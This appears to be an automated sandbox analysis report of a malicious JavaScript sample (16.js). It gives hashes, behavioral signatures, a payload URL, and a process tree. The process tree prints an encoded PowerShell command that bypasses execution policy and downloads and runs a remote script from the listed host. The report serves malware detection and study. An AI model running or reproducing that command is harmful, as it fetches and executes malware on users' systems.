Overview
overview
10Static
static
1½�...�/1.js
windows7-x64
10½�...�/1.js
windows10-2004-x64
10½�.../10.js
windows7-x64
8½�.../10.js
windows10-2004-x64
8½�.../11.js
windows7-x64
3½�.../11.js
windows10-2004-x64
8½�.../12.js
windows7-x64
8½�.../12.js
windows10-2004-x64
8½�.../13.js
windows7-x64
3½�.../13.js
windows10-2004-x64
8½�.../14.js
windows7-x64
3½�.../14.js
windows10-2004-x64
8½�.../15.js
windows7-x64
10½�.../15.js
windows10-2004-x64
10½�.../16.js
windows7-x64
10½�.../16.js
windows10-2004-x64
10½�.../17.js
windows7-x64
3½�.../17.js
windows10-2004-x64
7½�.../18.js
windows7-x64
3½�.../18.js
windows10-2004-x64
7½�.../19.js
windows7-x64
3½�.../19.js
windows10-2004-x64
8½�...�/2.js
windows7-x64
10½�...�/2.js
windows10-2004-x64
10½�.../20.js
windows7-x64
10½�.../20.js
windows10-2004-x64
10½�.../21.js
windows7-x64
1½�.../21.js
windows10-2004-x64
1½�.../22.js
windows7-x64
10½�.../22.js
windows10-2004-x64
10½�.../23.js
windows7-x64
3½�.../23.js
windows10-2004-x64
8Analysis
-
max time kernel
144s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
14-10-2023 03:57
Static task
static1
Behavioral task
behavioral1
Sample
½ļ/1.js
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
½ļ/1.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral3
Sample
½ļ/10.js
Resource
win7-20230831-en
Behavioral task
behavioral4
Sample
½ļ/10.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral5
Sample
½ļ/11.js
Resource
win7-20230831-en
Behavioral task
behavioral6
Sample
½ļ/11.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral7
Sample
½ļ/12.js
Resource
win7-20230831-en
Behavioral task
behavioral8
Sample
½ļ/12.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral9
Sample
½ļ/13.js
Resource
win7-20230831-en
Behavioral task
behavioral10
Sample
½ļ/13.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral11
Sample
½ļ/14.js
Resource
win7-20230831-en
Behavioral task
behavioral12
Sample
½ļ/14.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral13
Sample
½ļ/15.js
Resource
win7-20230831-en
Behavioral task
behavioral14
Sample
½ļ/15.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral15
Sample
½ļ/16.js
Resource
win7-20230831-en
Behavioral task
behavioral16
Sample
½ļ/16.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral17
Sample
½ļ/17.js
Resource
win7-20230831-en
Behavioral task
behavioral18
Sample
½ļ/17.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral19
Sample
½ļ/18.js
Resource
win7-20230831-en
Behavioral task
behavioral20
Sample
½ļ/18.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral21
Sample
½ļ/19.js
Resource
win7-20230831-en
Behavioral task
behavioral22
Sample
½ļ/19.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral23
Sample
½ļ/2.js
Resource
win7-20230831-en
Behavioral task
behavioral24
Sample
½ļ/2.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral25
Sample
½ļ/20.js
Resource
win7-20230831-en
Behavioral task
behavioral26
Sample
½ļ/20.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral27
Sample
½ļ/21.js
Resource
win7-20230831-en
Behavioral task
behavioral28
Sample
½ļ/21.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral29
Sample
½ļ/22.js
Resource
win7-20230831-en
Behavioral task
behavioral30
Sample
½ļ/22.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral31
Sample
½ļ/23.js
Resource
win7-20230831-en
Behavioral task
behavioral32
Sample
½ļ/23.js
Resource
win10v2004-20230915-en
General
-
Target
½ļ/16.js
-
Size
32KB
-
MD5
1b0eaa2c2511d5c5bf2fff542b172a49
-
SHA1
bce5600d8e4bb7353b67f52a388e56063fd1ae85
-
SHA256
2d16b8541eb251e09be8589e1d140a14f8392cc055d3b15936edcddad91b5923
-
SHA512
e2e4ac0468a3637bdcb2598444759856f547624e07a87837ed501199947dbf1435e2fef60f66d182c72159b5a06395cb5d39411b5df9f7c3a55c2c40a8fa7511
-
SSDEEP
384:IsDLhfkGwaE6EIWNIalL+W9zCdrnQfF+M5WHZX8thvrtVOETBFtXBRo3yhuiUhR0:XMhIzWOzQfFb5q8hfjWouiwRoz2y
Malware Config
Extracted
https://bikexiner.lotieneconisiore.com/file1.ps1
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 22 824 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation wscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3520 powershell.exe 3520 powershell.exe 824 powershell.exe 824 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3520 powershell.exe Token: SeDebugPrivilege 824 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2000 wrote to memory of 3520 2000 wscript.exe 85 PID 2000 wrote to memory of 3520 2000 wscript.exe 85 PID 3520 wrote to memory of 824 3520 powershell.exe 87 PID 3520 wrote to memory of 824 3520 powershell.exe 87
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\½ļ\16.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" PowersheLL -eP byPASs -EnC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBiAGkAawBlAHgAaQBuAGUAcgAuAGwAbwB0AGkAZQBuAGUAYwBvAG4AaQBzAGkAbwByAGUALgBjAG8AbQAvAGYAaQBsAGUAMQAuAHAAcwAxACIAKQA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3520 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eP byPASs -EnC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBiAGkAawBlAHgAaQBuAGUAcgAuAGwAbwB0AGkAZQBuAGUAYwBvAG4AaQBzAGkAbwByAGUALgBjAG8AbQAvAGYAaQBsAGUAMQAuAHAAcwAxACIAKQA=3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:824
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
64B
MD53ca1082427d7b2cd417d7c0b7fd95e4e
SHA1b0482ff5b58ffff4f5242d77330b064190f269d3
SHA25631f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82